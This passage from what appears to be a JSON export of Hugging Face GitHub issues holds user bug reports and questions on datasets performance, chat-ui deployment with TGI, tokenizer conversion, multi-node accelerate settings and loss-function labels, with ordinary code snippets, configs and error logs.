about it again.\r\nIt also means you either need to have the uploader compute it _every time_, or have a hook that computes it.\r\n\r\n## Smaller project, immediate payoff: Be diligent in avoiding deepcopy\r\n\r\nRevise the _ls_tree method to avoid deepcopy:\r\n```\r\n def _ls_tree(\r\n self,\r\n path: str,\r\n recursive: bool = False,\r\n refresh: bool = False,\r\n revision: Optional[str] = None,\r\n expand_info: bool = True,\r\n ):\r\n ..... 
omitted .....\r\n for path_info in tree:\r\n if isinstance(path_info, RepoFile):\r\n cache_path_info = {\r\n \"name\": root_path + \"/\" + path_info.path,\r\n \"size\": path_info.size,\r\n \"type\": \"file\",\r\n \"blob_id\": path_info.blob_id,\r\n \"lfs\": path_info.lfs,\r\n \"last_commit\": path_info.last_commit,\r\n \"security\": path_info.security,\r\n }\r\n else:\r\n cache_path_info = {\r\n \"name\": root_path + \"/\" + path_info.path,\r\n \"size\": 0,\r\n \"type\": \"directory\",\r\n \"tree_id\": path_info.tree_id,\r\n \"last_commit\": path_info.last_commit,\r\n }\r\n parent_path = self._parent(cache_path_info[\"name\"])\r\n self.dircache.setdefault(parent_path, []).append(cache_path_info)\r\n out.append(cache_path_info)\r\n return copy.deepcopy(out) # copy to not let users modify the dircache\r\n```\r\nObserve this deepcopy at the end. It is making a copy of a very simple data structure. We do not need to copy. We can simply generate the data structure twice instead. It will be much faster.\r\n```\r\n def _ls_tree(\r\n self,\r\n path: str,\r\n recursive: bool = False,\r\n refresh: bool = False,\r\n revision: Optional[str] = None,\r\n expand_info: bool = True,\r\n ):\r\n ..... omitted .....\r\n def make_cache_path_info(path_info):\r\n if isinstance(path_info, RepoFile):\r\n return {\r\n \"name\": root_path + \"/\" + path_info.path,\r\n \"size\": path_info.size,\r\n \"type\": \"file\",\r\n \"blob_id\": path_info.blob_id,\r\n \"lfs\": path_info.lfs,\r\n \"last_commit\": path_info.last_commit,\r\n \"security\": path_info.security,\r\n }\r\n else:\r\n return {\r\n \"name\": root_path + \"/\" + path_info.path,\r\n \"size\": 0,\r\n \"type\": \"directory\",\r\n \"tree_id\": path_info.tree_id,\r\n \"last_commit\": path_info.last_commit,\r\n }\r\n for path_info in tree:\r\n cache_path_info = make_cache_path_info(path_info)\r\n out_cache_path_info = make_cache_path_info(path_info) # copy to not let users modify the dircache\r\n parent_path = self._parent(cache_path_info[\"name\"])\r\n self.dircache.setdefault(parent_path, []).append(cache_path_info)\r\n out.append(out_cache_path_info)\r\n return out\r\n```\r\nNote there is no longer a deepcopy in this method. We have replaced it with generating the output twice. This is substantially faster. For me, the entire resolution went from 1100s to 360s.\r\n\r\n## Medium project, medium payoff\r\nAfter the above change, we have this profile:\r\n![image](https://github.com/huggingface/datasets/assets/159512661/db7b83da-2dfc-4c2e-abab-0ede9477876c)\r\nFigure 2: x-axis is 355 seconds. Note that globbing and _ls_tree deep copy is gone. No surprise there. It's much faster now, but we still spend ~187 seconds i", "url": "https://github.com/huggingface/datasets/issues/6726", "state": "open", "labels": [], "created_at": "2024-03-09T07:08:45Z", "updated_at": "2024-03-09T07:11:08Z", "comments": 2, "user": "awgr" }, { "repo": "huggingface/alignment-handbook", "number": 133, "title": "Early Stopping Issue when used with ConstantLengthDataset", "body": "Hello,\r\nI modified the code to include the ConstantLengthDataset, and it stops early at around 15% of the training. This issue doesn't occur with the normal, unmodified code. Is there an issue with ConstantLengthDataset? 
I used it with SFTTrainer.", "url": "https://github.com/huggingface/alignment-handbook/issues/133", "state": "open", "labels": [], "created_at": "2024-03-08T23:08:08Z", "updated_at": "2024-03-08T23:08:08Z", "comments": 0, "user": "sankydesai" }, { "repo": "huggingface/transformers.js", "number": 635, "title": "Failed to process file. and Failed to upload.", "body": "### Question\n\nI am hosting Supabase on Docker in Ubuntu, and I am facing file upload failures on the chatbot-ui. The error messages displayed are \"Failed to process file\" and \"Failed to upload.\" The console output error messages are as follows:\r\n\r\n- POST https://chat.example.com/api/retrieval/process 500 (Internal Server Error)\r\n- GET https://supa.example.com/rest/v1/files?select=*&id=eq.5186a7c7-ff34-4a40-98c1-db8d36e47896 406 (Not Acceptable)\r\n\r\nFile uploads fail regardless of the file type - whether it's a file with a purely English filename, a .txt file, or a .docx file. \r\n\r\nAdditionally, registration, login, chatting, and uploading images are functioning properly.", "url": "https://github.com/huggingface/transformers.js/issues/635", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-08T13:07:18Z", "updated_at": "2024-03-08T13:22:57Z", "user": "chawaa" }, { "repo": "huggingface/peft", "number": 1545, "title": "How to use LoRA to finetune a MoE model", "body": "", "url": "https://github.com/huggingface/peft/issues/1545", "state": "closed", "labels": [], "created_at": "2024-03-08T11:45:09Z", "updated_at": "2024-04-16T15:03:39Z", "user": "Minami-su" }, { "repo": "huggingface/datatrove", "number": 119, "title": "How about making a Ray executor for deduplication?", "body": "- https://github.com/ChenghaoMou/text-dedup/blob/main/text_dedup/minhash_spark.py\r\n- reference: https://github.com/alibaba/data-juicer/blob/main/data_juicer/core/ray_executor.py\r\n- Ray is simpler and faster than Spark\r\n", "url": "https://github.com/huggingface/datatrove/issues/119", "state": "closed", "labels": [], "created_at": "2024-03-08T11:37:13Z", "updated_at": "2024-04-11T12:48:53Z", "user": "simplew2011" }, { "repo": "huggingface/transformers.js", "number": 634, "title": "For nomic-ai/nomic-embed-text-v1 8192 context length", "body": "### Question\n\nAs per the documentation: https://huggingface.co/nomic-ai/nomic-embed-text-v1\r\n\r\nThe model supports an 8192 context length; however, in transformers.js, model_max_length is 512.\r\n\r\nAny guidance on how to use the full context (8192) instead of 512?", "url": "https://github.com/huggingface/transformers.js/issues/634", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-08T05:33:39Z", "updated_at": "2025-10-13T04:57:49Z", "user": "faizulhaque" }, { "repo": "huggingface/diffusers", "number": 7254, "title": "Request proper examples on how to train a diffusion model with diffusers on a large-scale dataset like LAION", "body": "Hi, I do not see any examples in diffusers/examples on how to train a diffusion model with diffusers on a large-scale dataset like LAION. 
However, it is important, since many works want to integrate their models into diffusers; if they could also train their models in diffusers, that would make it much easier for them to do so.", "url": "https://github.com/huggingface/diffusers/issues/7254", "state": "closed", "labels": [ "stale" ], "created_at": "2024-03-08T01:31:33Z", "updated_at": "2024-06-30T05:27:57Z", "user": "Luciennnnnnn" }, { "repo": "huggingface/swift-transformers", "number": 56, "title": "How to get models?", "body": "Missing in the docs?", "url": "https://github.com/huggingface/swift-transformers/issues/56", "state": "closed", "labels": [], "created_at": "2024-03-07T15:47:54Z", "updated_at": "2025-02-11T11:41:32Z", "user": "pannous" }, { "repo": "huggingface/datasets", "number": 6721, "title": "Do you know how to load a dataset from a local file now?", "body": "Hi, if I want to load a dataset from a local file, how do I specify the configuration name?\r\n\r\n_Originally posted by @WHU-gentle in https://github.com/huggingface/datasets/issues/2976#issuecomment-1333455222_\r\n ", "url": "https://github.com/huggingface/datasets/issues/6721", "state": "open", "labels": [], "created_at": "2024-03-07T13:58:40Z", "updated_at": "2024-03-31T08:09:25Z", "user": "Gera001" }, { "repo": "huggingface/transformers.js", "number": 633, "title": "Is the 'aggregation_strategy' parameter available for the token classification pipeline?", "body": "### Question\n\nHi, I have a question.\r\n\r\nThe HuggingFace Transformers documentation lists an **'aggregation_strategy'** parameter for the token classification pipeline. [Link](https://huggingface.co/docs/transformers/en/main_classes/pipelines#transformers.TokenClassificationPipeline.aggregation_strategy)\r\nI need to know: does this library provide this parameter?\r\n\r\nThanks.\r\n", "url": "https://github.com/huggingface/transformers.js/issues/633", "state": "open", "labels": [ "help wanted", "good first issue", "question" ], "created_at": "2024-03-07T07:02:55Z", "updated_at": "2024-06-09T15:16:56Z", "user": "boat-p" }, { "repo": "huggingface/swift-coreml-diffusers", "number": 93, "title": "Blocked at \"loading\" screen - how to reset the app / cache?", "body": "After playing a bit with the app, it now stays in the \"Loading\" state at startup (see screenshot).\r\n\r\nI tried to remove the cache in `~/Library/Application Support/hf-diffusion-models`, but that just causes a re-download.\r\n\r\nHow can I reset the app, delete all files created, and start as if on a fresh machine again?\r\n\r\nAlternatively, how can I get past the \"Loading\" screen?\r\n\r\n\"image\"\r\n", "url": "https://github.com/huggingface/swift-coreml-diffusers/issues/93", "state": "open", "labels": [], "created_at": "2024-03-06T12:50:29Z", "updated_at": "2024-03-10T11:24:49Z", "user": "sebsto" }, { "repo": "huggingface/chat-ui", "number": 905, "title": "Fail to create assistant. ", "body": "I use the docker image chat-ui-db as the frontend, text-generation-inference as the inference backend, and meta-llamaLlama-2-70b-chat-hf as the model. Using the image and model mentioned above, I set up a large language model dialog service on server A. Assume that the IP address of server A is x.x.x.x.\r\nI use docker compose to deploy it. 
The content of docker-compose.yml is as follows:\r\n```\r\nservices:\r\n chat-ui:\r\n image: chat-ui-db:latest\r\n ports:\r\n - \"3000:3000\"\r\n restart: unless-stopped\r\n textgen:\r\n image: huggingface/text-generation-inference:1.4\r\n ports:\r\n - \"8080:80\"\r\n command: [\"--model-id\", \"/data/models/meta-llamaLlama-2-70b-chat-hf\"]\r\n volumes:\r\n - /home/test/llm-test/serving/data:/data\r\n deploy:\r\n resources:\r\n reservations:\r\n devices:\r\n - driver: nvidia\r\n count: 8\r\n capabilities: [gpu]\r\n restart: unless-stopped\r\n```\r\nI set ENABLE_ASSISTANTS=true in .env.local to enable the assistants feature. \r\nI logged into localhost:3000 using Chrome, clicked the settings button, and then clicked the create new assistant button. I entered the information in the Name and Description text boxes, selected a model, and entered the information in the User start messages and Instructions (system prompt) text boxes. Finally, I clicked the Create button. I can create an assistant just fine.\r\n\r\nThen I went to x.x.x.x:3000 from a browser on a different server and accessed the service. (One may ask how I can access server A's services from other servers without logging in; the solution is to use nginx as an HTTP-to-HTTPS reverse proxy (https://www.inovex.de/de/blog/code-assistant-how-to-self-host-your-own/).) I clicked the settings button, and then clicked the create new assistant button. I entered the information in the Name and Description text boxes, selected a model, and entered the information in the User start messages and Instructions (system prompt) text boxes. Finally, I clicked the Create button. The webpage did not respond, and the container logs don't show anything either. I couldn't create an assistant.\r\n\r\nWhat should I do?\r\n\r\nDo I have to enable login authentication to create an assistant, unless I'm accessing it from localhost? I'm on a LAN, and I can't get user authentication through Hugging Face or Google. I have also tried to set up a user authentication service using Keycloak and configure .env.local to enable OpenID login, but the attempt failed. See this page (https://github.com/huggingface/chat-ui/issues/896) for the specific problem.\r\n", "url": "https://github.com/huggingface/chat-ui/issues/905", "state": "open", "labels": [], "created_at": "2024-03-06T08:33:03Z", "updated_at": "2024-03-06T08:33:03Z", "comments": 0, "user": "majestichou" }, { "repo": "huggingface/chat-ui", "number": 904, "title": "Running the project with `npm run dev`, but it does not hot reload.", "body": "Am I alone in this issue, or are you just developing without hot reload? Does anyone have any ideas on how to resolve it?\r\n\r\n**UPDATES:**\r\nIt happens whenever you're running it on WSL.\r\n\r\nI guess this is an unrelated issue, so feel free to close, but it would still be nice to know how to resolve this.", "url": "https://github.com/huggingface/chat-ui/issues/904", "state": "closed", "labels": [], "created_at": "2024-03-06T03:34:21Z", "updated_at": "2024-03-06T16:07:11Z", "comments": 2, "user": "CakeCrusher" }, { "repo": "huggingface/dataset-viewer", "number": 2550, "title": "More precise dataset size computation", "body": "Currently, the Hub uses the `/size` endpoint's `num_bytes_original_files` value to display the `Size of downloaded dataset files` on a dataset's card page. 
However, this value does not consider a possible overlap between the configs' data files (and simply [sums](https://github.com/huggingface/datasets-server/blob/e4aac49c4d3c245cb3c0e48695b7d24a934a8377/services/worker/src/worker/job_runners/dataset/size.py#L97-L98) all the configs' sizes up), in which case the shared files need to be downloaded only once. Both `datasets` and `hfh` recognize this (by downloading them once), so the size computation should account for it, too.\r\n\r\ncc @guipenedo who reported this behavior first", "url": "https://github.com/huggingface/dataset-viewer/issues/2550", "state": "open", "labels": [ "question", "P2" ], "created_at": "2024-03-05T22:22:24Z", "updated_at": "2024-05-24T20:59:36Z", "user": "mariosasko" }, { "repo": "huggingface/datasets", "number": 6719, "title": "Is there any way to solve hanging of IterableDataset when using split_dataset_by_node + filtering during inference?", "body": "### Describe the bug\n\nI am using an iterable dataset in a multi-node setup, trying to do training/inference while filtering the data on the fly. I usually do not use `split_dataset_by_node`, but the IterableDatasetShard used in `accelerate` and `transformers` is very slow. When I filter after applying `split_dataset_by_node`, it results in shards of unequal size, since a different number of samples is filtered from each one. \r\n\r\nThe distributed process hangs when trying to accomplish this. Is there any way to resolve this, or is it impossible to implement?\r\n\r\n\n\n### Steps to reproduce the bug\n\nHere is a toy example of what I am trying to do that reproduces the behavior\r\n\r\n```\r\n# torchrun --nproc-per-node 2 file.py\r\n\r\n\r\nimport os\r\n\r\nimport pandas as pd\r\nimport torch\r\nfrom accelerate import Accelerator\r\nfrom datasets import Features, Value, load_dataset\r\nfrom datasets.distributed import split_dataset_by_node\r\nfrom torch.utils.data import DataLoader\r\n\r\naccelerator = Accelerator(device_placement=True, dispatch_batches=False)\r\nif accelerator.is_main_process:\r\n if not os.path.exists(\"scratch_data\"):\r\n os.mkdir(\"scratch_data\")\r\n\r\n n_shards = 4\r\n for i in range(n_shards):\r\n df = pd.DataFrame({\"id\": list(range(10 * i, 10 * (i + 1)))})\r\n df.to_parquet(f\"scratch_data/shard_{i}.parquet\")\r\n\r\n\r\nworld_size = accelerator.num_processes\r\nlocal_rank = accelerator.process_index\r\n\r\n\r\ndef collate_fn(examples):\r\n input_ids = []\r\n for example in examples:\r\n input_ids.append(example[\"id\"])\r\n return torch.LongTensor(input_ids)\r\n\r\n\r\ndataset = load_dataset(\r\n \"parquet\", data_dir=\"scratch_data\", split=\"train\", streaming=True\r\n)\r\ndataset = (\r\n split_dataset_by_node(dataset, rank=local_rank, world_size=world_size)\r\n .filter(lambda x: x[\"id\"] < 35)\r\n .shuffle(seed=42, buffer_size=100)\r\n)\r\n\r\nbatch_size = 2\r\ntrain_dataloader = DataLoader(\r\n dataset,\r\n batch_size=batch_size,\r\n collate_fn=collate_fn,\r\n num_workers=2\r\n) \r\n\r\nfor x in train_dataloader:\r\n x = x.to(accelerator.device)\r\n print({\"rank\": local_rank, \"id\": x})\r\n \r\n y = accelerator.gather_for_metrics(x)\r\n if accelerator.is_main_process:\r\n print(\"gathered\", y)\r\n\r\n\r\n```\n\n### Expected behavior\n\nIs there any way to continue training/inference on the GPUs that have remaining data left without waiting for the others? 
Is it impossible to filter when \n\n### Environment info\n\n- `datasets` version: 2.18.0\r\n- Platform: Linux-5.10.209-198.812.amzn2.x86_64-x86_64-with-glibc2.31\r\n- Python version: 3.10.13\r\n- `huggingface_hub` version: 0.21.3\r\n- PyArrow version: 15.0.0\r\n- Pandas version: 2.2.1\r\n- `fsspec` version: 2023.6.0", "url": "https://github.com/huggingface/datasets/issues/6719", "state": "open", "labels": [], "created_at": "2024-03-05T15:55:13Z", "updated_at": "2024-03-05T15:55:13Z", "comments": 0, "user": "ssharpe42" }, { "repo": "huggingface/chat-ui", "number": 899, "title": "Bug--Llama-2-70b-chat-hf error: `truncate` must be strictly positive and less than 1024. Given: 3072", "body": "I use the docker image chat-ui-db as the frontend, text-generation-inference as the inference backend, and meta-llamaLlama-2-70b-chat-hf as the model.\r\nIn the model field of the .env.local file, I have the following settings\r\n```\r\nMODELS=`[\r\n {\r\n \"name\": \"meta-llama/Llama-2-70b-chat-hf\",\r\n \"endpoints\": [{\r\n \"type\" : \"tgi\",\r\n \"url\": \"http://textgen:80\",\r\n }],\r\n \"preprompt\": \" \",\r\n \"chatPromptTemplate\" : \"[INST] <>\\n{{preprompt}}\\n<>\\n\\n{{#each messages}}{{#ifUser}}{{content}} [/INST] {{/ifUser}}{{#ifAssistant}}{{content}} [INST] {{/ifAssistant}}{{/each}}\",\r\n \"promptExamples\": [\r\n {\r\n \"title\": \"Write an email from bullet list\",\r\n \"prompt\": \"As a restaurant owner, write a professional email to the supplier to get these products every week: \\n\\n- Wine (x10)\\n- Eggs (x24)\\n- Bread (x12)\"\r\n }, {\r\n \"title\": \"Code a snake game\",\r\n \"prompt\": \"Code a basic snake game in python, give explanations for each step.\"\r\n }, {\r\n \"title\": \"Assist in a task\",\r\n \"prompt\": \"How do I make a delicious lemon cheesecake?\"\r\n }\r\n ],\r\n \"parameters\": {\r\n \"temperature\": 0.1,\r\n \"top_p\": 0.95,\r\n \"repetition_penalty\": 1.2,\r\n \"top_k\": 50,\r\n \"truncate\": 3072,\r\n \"max_new_tokens\": 1024,\r\n \"stop\" : [\"\", \"[INST]\"]\r\n }\r\n }\r\n]`\r\n```\r\nThis setting is the same as the setting for Llama-2-70b-chat-hf in the .env.template file in the chat-ui repository.\r\nThen I type the question in the input box. An error has occurred.\r\nThe following error information is found in the log:\r\n```\r\ntextgen | 2024-03-05T20:00:38.883413Z ERROR compat_generate{default_return_full_text=false compute_type=Extension(ComputeType(\"8-nvidia-a100-sxm4-40gb\"))}:generate_stream{parameters=GenerateParameters { best_of: None, temperature: Some(0.1), repetition_penalty: Some(1.2), frequency_penalty: None, top_k: Some(50), top_p: Some(0.95), typical_p: None, do_sample: false, max_new_tokens: Some(1024), return_full_text: Some(false), stop: [\"\", \"[INST]\"], truncate: Some(3072), watermark: false, details: false, decoder_input_details: false, seed: None, top_n_tokens: None, grammar: None }}:async_stream:generate_stream: text_generation_router::infer: router/src/infer.rs:123: `truncate` must be strictly positive and less than 1024. Given: 3072\r\nchat-ui | Error: Input validation error: `truncate` must be strictly positive and less than 1024. 
Given: 3072\r\nchat-ui | at streamingRequest (file:///app/node_modules/@huggingface/inference/dist/index.mjs:323:19)\r\nchat-ui | at process.processTicksAndRejections (node:internal/process/task_queues:95:5)\r\nchat-ui | at async textGenerationStream (file:///app/node_modules/@huggingface/inference/dist/index.mjs:673:3)\r\nchat-ui | at async generateFromDefaultEndpoint (file:///app/.svelte-kit/output/server/entries/endpoints/conversation/_id_/_server.ts.js:39:20)\r\nchat-ui | at async summarize (file:///app/.svelte-kit/output/server/entries/endpoints/conversation/_id_/_server.ts.js:287:10)\r\nchat-ui | at async file:///app/.svelte-kit/output/server/entries/endpoints/conversation/_id_/_server.ts.js:607:26\r\ntextgen | 2024-03-05T20:00:38.910266Z ERROR compat_generate{default_return_full_text=false compute_type=Extension(ComputeType(\"8-nvidia-a100-sxm4-40gb\"))}:generate_stream{parameters=GenerateParameters { best_of: None, temperature: Some(0.1), repetition_penalty: Some(1.2), frequency_penalty: None, top_k: Some(50), top_p: Some(0.95), typical_p: None, do_sample: false, max_new_tokens: Some(1024), return_full_text: Some(false), stop: [\"\", \"[INST]\"], truncate: Some(3072), watermark: false, details: false, decoder_input_details: false, seed: None, top_n_tokens: None, grammar: None }}:async_stream:generate_stream: text_generation_router::infer: router/src/infer.rs:123: `truncate` must be strictly positive and less than 1024. Given: 3072\r\n```\r\nIf I set \"truncate\" to 1000, everything is OK.\r\n**\"truncate\" for Llama-2-70b-chat-hf in the .env.template file in the chat-ui repository is 3072. I think 3072 should work fine. I don't know how the webpage https://huggingface.co/chat/ sets this parameter.**\r\n\r\n", "url": "https://github.com/huggingface/chat-ui/issues/899", "state": "open", "labels": [ "support", "models" ], "created_at": "2024-03-05T12:27:45Z", "updated_at": "2024-03-06T00:59:10Z", "comments": 4, "user": "majestichou" }, { "repo": "huggingface/tokenizers", "number": 1468, "title": "How to convert tokenizers.tokenizer to XXTokenizerFast in transformers?", "body": "### Motivation\r\nI followed the guide [build-a-tokenizer-from-scratch](https://huggingface.co/docs/tokenizers/quicktour#build-a-tokenizer-from-scratch) and got a single tokenizer.json from my corpus. Since I'm not sure if it is compatible with the trainer, I want to convert it back to XXTokenizerFast in transformers.\r\n### Observation\r\nIn [llama2-7b-hf](https://huggingface.co/meta-llama/Llama-2-7b-hf/tree/main), the tokenizer files seem to consist of:\r\n[tokenizer.json](https://huggingface.co/meta-llama/Llama-2-7b-hf/blob/main/tokenizer.json) \u2705 I have \r\n[tokenizer.model](https://huggingface.co/meta-llama/Llama-2-7b-hf/blob/main/tokenizer.model) \u2716 I don't have it; not sure of its usage\r\n[tokenizer_config.json](https://huggingface.co/meta-llama/Llama-2-7b-hf/blob/main/tokenizer_config.json) \u2716 I don't have it, but this looks not that important. 
I can manually set this.\r\nInitializing a LlamaTokenizerFast from scratch through the \_\_init\_\_ function seems to require tokenizer.model and tokenizer.json, but I don't get a tokenizer.model.\r\n```\r\ndef __init__(\r\n self,\r\n vocab_file=None,\r\n tokenizer_file=None,\r\n clean_up_tokenization_spaces=False,\r\n unk_token=\"\",\r\n bos_token=\"\",\r\n eos_token=\"\",\r\n add_bos_token=True,\r\n add_eos_token=False,\r\n use_default_system_prompt=False,\r\n add_prefix_space=None,\r\n **kwargs,\r\n ):\r\n```\r\nAfter diving deeper into [transformers.PreTrainedTokenizerFast._save_pretrained](https://github.com/huggingface/transformers/blob/4fc708f98c9c8d5cb48e8a2639e3f7a21c65802f/src/transformers/tokenization_utils_fast.py#L678), I found a code snippet in which the fast tokenizer in transformers seems to save only tokenizer.json, without tokenizer.model\r\n```\r\nif save_fast:\r\n tokenizer_file = os.path.join(\r\n save_directory, (filename_prefix + \"-\" if filename_prefix else \"\") + TOKENIZER_FILE\r\n )\r\n self.backend_tokenizer.save(tokenizer_file)\r\n file_names = file_names + (tokenizer_file,)\r\n```\r\n### Trial\r\nSo I just use xxTokenizerFast.from_pretrained('dir_contained_my_tokenizer.json'), and it works with the default config; I can modify it manually and save_pretrained to get tokenizer_config.json\r\n### Query\r\nI still have some queries that need help.\r\n1. What's the role of tokenizer.model? Is it a subset of tokenizer.json?\r\n2. Is my conversion method correct? Or is there a better method?", "url": "https://github.com/huggingface/tokenizers/issues/1468", "state": "closed", "labels": [ "Stale", "planned" ], "created_at": "2024-03-05T06:32:27Z", "updated_at": "2024-07-21T01:57:17Z", "user": "rangehow" }, { "repo": "huggingface/gsplat.js", "number": 71, "title": "How to support VR?", "body": "It would be great to be able to use VR on a VR device.", "url": "https://github.com/huggingface/gsplat.js/issues/71", "state": "closed", "labels": [], "created_at": "2024-03-05T05:03:17Z", "updated_at": "2024-03-05T07:55:53Z", "user": "did66" }, { "repo": "huggingface/tgi-gaudi", "number": 95, "title": "How to use FP8 feature in TGI-gaudi", "body": "### System Info\n\nThe FP8 quantization feature has been incorporated into the TGI-Gaudi branch. However, guidance is needed on how to utilize this feature. The process involves running the FP8 quantization through Measurement Mode and Quantization Mode. How to enable FP8 using the TGI 'docker run' command? 
Could you kindly provide a step-by-step guide on utilizing this feature?\n\n### Information\n\n- [ ] Docker\n- [ ] The CLI directly\n\n### Tasks\n\n- [ ] An officially supported command\n- [ ] My own modifications\n\n### Reproduction\n\nRun the FP8 quantization feature using the \"docker run\" command.\n\n### Expected behavior\n\nA clear guide can be provided to use the FP8 quantization feature.", "url": "https://github.com/huggingface/tgi-gaudi/issues/95", "state": "closed", "labels": [], "created_at": "2024-03-05T02:50:08Z", "updated_at": "2024-05-06T09:03:15Z", "user": "lvliang-intel" }, { "repo": "huggingface/accelerate", "number": 2521, "title": "how to set `num_processes` in multi-node training", "body": "Is it the total number of gpus or the number of gpus on a single node?\r\nI have seen contradictory signals in the code.\r\n\r\nhttps://github.com/huggingface/accelerate/blob/ee004674b9560976688e1a701b6d3650a09b2100/docs/source/usage_guides/ipex.md?plain=1#L139 https://github.com/huggingface/accelerate/blob/ee004674b9560976688e1a701b6d3650a09b2100/src/accelerate/state.py#L154\r\nhere, it seems like the total number of gpus.\r\n\r\nhttps://github.com/huggingface/accelerate/blob/ee004674b9560976688e1a701b6d3650a09b2100/examples/slurm/submit_multigpu.sh#L27\r\nhere, it seems like the number of gpus per node.", "url": "https://github.com/huggingface/accelerate/issues/2521", "state": "closed", "labels": [], "created_at": "2024-03-04T13:03:57Z", "updated_at": "2025-12-22T01:53:32Z", "user": "lxww302" }, { "repo": "huggingface/distil-whisper", "number": 95, "title": "How to use distil-whisper-large-v3-de-kd model from HF?", "body": "Officially, multi-language support is still not implemented in distil-whisper.\r\n\r\nBut I noticed that the esteemed @sanchit-gandhi uploaded a German model for distil-whisper to HuggingFace, called 'distil-whisper-large-v3-de-kd'.\r\n\r\nHow can I use this specific model for transcribing something? ", "url": "https://github.com/huggingface/distil-whisper/issues/95", "state": "open", "labels": [], "created_at": "2024-03-04T12:01:13Z", "updated_at": "2024-04-02T09:40:46Z", "user": "Arche151" }, { "repo": "huggingface/transformers.js", "number": 623, "title": "Converted QA model answers in lower case, original model does not. What am I doing wrong?", "body": "### Question\n\nI have converted [deutsche-telekom/electra-base-de-squad2](https://huggingface.co/deutsche-telekom/electra-base-de-squad2) to ONNX using ```python -m scripts.convert --quantize --model_id deutsche-telekom/electra-base-de-squad2```. The ONNX model, used with the same code, returns answers in lower case, whereas the original model returns the answer respecting case sensitivity. I noticed that the ```tokenizer_config.json``` in the original model contains ```\"do_lower_case\": false```. But even setting this to ```true``` before converting does not work. 
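\r\n\r\nFor completeness, the edit itself was just a plain JSON change on my local copy of the model before re-running the conversion (a sketch; the folder name is whatever you cloned the model into):\r\n\r\n```python\r\nimport json\r\n\r\ncfg_path = \"electra-base-de-squad2/tokenizer_config.json\"  # local clone, path assumed\r\nwith open(cfg_path) as f:\r\n    cfg = json.load(f)\r\n\r\ncfg[\"do_lower_case\"] = False  # I tried both True and False here\r\nwith open(cfg_path, \"w\") as f:\r\n    json.dump(cfg, f, indent=2)\r\n```\r\n\r\n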
What am I doing wrong?\r\n\r\nCode is straightforward:\r\n\r\n```javascript\r\nimport { pipeline } from '@xenova/transformers';\r\nconst pipe = await pipeline('question-answering', 'conventic/electra-base-de-squad2-onnx');\r\nconst context = \"\";\r\nconst question = \"\";\r\nconst out = await pipe(question, context);\r\nconsole.log(out);\r\n```", "url": "https://github.com/huggingface/transformers.js/issues/623", "state": "open", "labels": [ "question" ], "created_at": "2024-03-04T11:56:44Z", "updated_at": "2024-03-04T11:56:44Z", "user": "MarceloEmmerich" }, { "repo": "huggingface/transformers.js", "number": 618, "title": "How do I convert a DistilBERT Model to Quantized ONNX -", "body": "### Question\n\nNote, https://huggingface.co/docs/transformers.js/en/index#convert-your-models-to-onnx is a broken link.\r\n\r\nI have a simple DistilBERT model I'm trying to load with the examples/next-server (wdavies/public-question-in-text)\r\n\r\nI tried the simplest version of converting to ONNX (wdavies/public-onnx-test following https://huggingface.co/docs/transformers/en/serialization#exporting-a--transformers-model-to-onnx-with-optimumonnxruntime), but I'm still getting an error message saying it's looking for quantized_onnx. \r\n\r\nAccording to all I can see, including this blog post, you seem to have to choose a specific hardware architecture? Is this true? How will I know what the client browser (or even mine) is running on? Help? I just want to run this simple model in examples/next-server?\r\n\r\nhttps://huggingface.co/blog/optimum-inference#34-use-the-ortquantizer-to-apply-dynamic-quantization \r\n", "url": "https://github.com/huggingface/transformers.js/issues/618", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-01T16:55:16Z", "updated_at": "2024-03-02T00:47:40Z", "user": "davies-w" }, { "repo": "huggingface/sentence-transformers", "number": 2521, "title": "Is the implementation of `MultipleNegativesRankingLoss` right?", "body": "It is confusing why the labels are `range(len(scores))`.\r\n```python\r\nclass MultipleNegativesRankingLoss(nn.Module):\r\n def __init__(self, model: SentenceTransformer, scale: float = 20.0, similarity_fct=util.cos_sim):\r\n super(MultipleNegativesRankingLoss, self).__init__()\r\n self.model = model\r\n self.scale = scale\r\n self.similarity_fct = similarity_fct\r\n self.cross_entropy_loss = nn.CrossEntropyLoss()\r\n\r\n def forward(self, sentence_features: Iterable[Dict[str, Tensor]], labels: Tensor):\r\n reps = [self.model(sentence_feature)[\"sentence_embedding\"] for sentence_feature in sentence_features]\r\n embeddings_a = reps[0]\r\n embeddings_b = torch.cat(reps[1:])\r\n\r\n scores = self.similarity_fct(embeddings_a, embeddings_b) * self.scale\r\n labels = torch.tensor(\r\n range(len(scores)), dtype=torch.long, device=scores.device\r\n ) # Example a[i] should match with b[i]\r\n return self.cross_entropy_loss(scores, labels)\r\n\r\n def get_config_dict(self):\r\n return {\"scale\": self.scale, \"similarity_fct\": self.similarity_fct.__name__}\r\n```", "url": "https://github.com/huggingface/sentence-transformers/issues/2521", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-01T10:13:35Z", "updated_at": "2024-03-04T07:01:12Z", "user": "ghost" }, { "repo": "huggingface/text-embeddings-inference", "number": 178, "title": "How to specify a local model", "body": "### Feature request\n\nmodel=BAAI/bge-reranker-large\r\nvolume=$PWD/data\r\ndocker run -p 8080:80 -v $volume:/data --pull always 
ghcr.io/huggingface/text-embeddings-inference:cpu-1.0 --model-id $model\n\n### Motivation\n\nmodel=BAAI/bge-reranker-large\r\nvolume=$PWD/data\r\ndocker run -p 8080:80 -v $volume:/data --pull always ghcr.io/huggingface/text-embeddings-inference:cpu-1.0 --model-id $model\n\n### Your contribution\n\nnull", "url": "https://github.com/huggingface/text-embeddings-inference/issues/178", "state": "closed", "labels": [], "created_at": "2024-03-01T09:40:07Z", "updated_at": "2024-03-01T16:54:27Z", "user": "yuanjie-ai" }, { "repo": "huggingface/chat-ui", "number": 889, "title": "How does huggingchat prompt the model to generate HTML output?", "body": "How does Huggingchat prompt the LLM to generate HTML output? Where can I find that prompt? I'd like to tweak it. thanks!", "url": "https://github.com/huggingface/chat-ui/issues/889", "state": "open", "labels": [], "created_at": "2024-02-29T17:20:01Z", "updated_at": "2024-03-05T18:45:56Z", "user": "vgoklani" }, { "repo": "huggingface/chat-ui", "number": 888, "title": "Code LLAMA doesn't work", "body": "I am simply entering this prompt:\r\n\r\n```\r\nYou're given the following regex in python: \\| *([^|]+?) *\\|\r\n\r\nThis captures text values in markdown tables but fails to capture numbers. Update this regex to capture numbers as well\r\n```\r\n\r\nThen what happens is that my 1 core of CPU is used 100% for at least for 5 mins until I close the browser. Not sure what is going on?\r\n\r\nSame prompt works when I use the Mistral 8 X 7B", 